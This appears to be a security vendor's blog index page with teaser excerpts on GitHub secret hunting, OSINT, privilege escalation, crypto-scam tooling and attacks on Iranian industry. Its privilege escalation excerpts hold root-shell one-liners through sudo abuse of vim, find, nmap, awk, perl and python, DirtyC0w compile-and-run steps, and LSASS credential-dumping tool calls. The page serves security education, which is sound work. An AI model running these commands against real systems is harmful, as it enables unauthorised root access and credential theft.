Blog

Github in the wild

Github in the wild

Github is important Oftentimes sensitive secrets stored in a target’s GitHub environment are overlooked and thus not reported in the tool output due to the limitations of automated scanning (regex, entropy searches, etc.). On the flip slide, too much information can be outputted by automated tools, making it difficult to discern true secrets from a …

Github in the wild Read More »

Introduction to Doxing

Introduction to OSINT

OSINT OSINT stands for Open Source Intelligence, it’s the OSINT full form, and is one of the key aspects in understanding the cybersecurity that rules the Internet these days. The term OSINT comes from many decades ago, in fact, US military agencies started using the term OSINT in the late 1980’s as they were re-evaluating …

Introduction to OSINT Read More »

43 Methods for Privilege Escalation

43 Methods for Privilege Escalation (Part 3)

Dump lsass with SilentProcessExit Domain: No Local Admin: Yes OS: Windows Type:  Enumeration & Hunting Methods:  SilentProcessExit.exe pid Lsass Shtinkering Domain: No Local Admin: Yes OS: Windows Type:  Enumeration & Hunting Methods:  HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->2 LSASS_Shtinkering.exe pid AndrewSpecial Domain: No Local Admin: Yes OS: Windows Type:  Enumeration & Hunting Methods:  AndrewSpecial.exe CCACHE ticket reuse from …

43 Methods for Privilege Escalation (Part 3) Read More »

74 Methods For Privilege Escalation Part 2 (1)

74 Methods for Privilege Escalation(Part 2)

DirtyC0w Domain: No Local Admin: Yes OS: Linux Type:  0/1 Exploit Methods:  gcc -pthread c0w.c -o c0w; ./c0w; passwd; id CVE-2016-1531 Domain: No Local Admin: Yes OS: Linux Type:  0/1 Exploit Methods:  CVE-2016-1531.sh;id Polkit Domain: No Local Admin: Yes OS: Linux Type:  0/1 Exploit Methods:  1. 2. poc.sh DirtyPipe Domain: No Local Admin: Yes OS: …

74 Methods for Privilege Escalation(Part 2) Read More »

40 Methods For Privilege Escalation Part 1

40 Methods for Privilege Escalation(Part 1)

Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type:  Abusing Privileged Files Methods:  sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN {system(“/bin/bash”)}’ sudo perl -e ‘exec “/bin/bash”;’ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo less /etc/hosts – …

40 Methods for Privilege Escalation(Part 1) Read More »

40 days in crypto scam

40 Days in Deep/Dark Web About Crypto Scam

Forward About document Summary of finding Tools Fake Transaction Generator Market drainer Nocryi Logs BradMax Logs Baron Cloud Logs Fate Cloud Logs Log Checker Magnus Ransomware Brute Force Seed Key Log Checker Wallet_dat_net Venom rat Redline  Abbrv. Market drainer Auto transfer Crypto base Mixed log Fake transaction Seed key crack RAMP Auto-withdrawal Forward Last year …

40 Days in Deep/Dark Web About Crypto Scam Read More »

TTPs Reviews In Attack Against The Industry in Iran

TTPs Reviews In Attack Against The Industry in Iran

A major cyberattack has hit the Iranian steel industry today, with hackers claiming to have taken control of systems at three state-owned companies. The incident may be the latest salvo in the escalating cyberwar between Iran and Israel. The video contains footage which purports to show the hacking group taking control of machinery inside one …

TTPs Reviews In Attack Against The Industry in Iran Read More »

Do you want quick & free cyber-security analysis of your application?

Secure your entire workforce, including remote employees.

TRY IT FREE

FOR 15 DAYS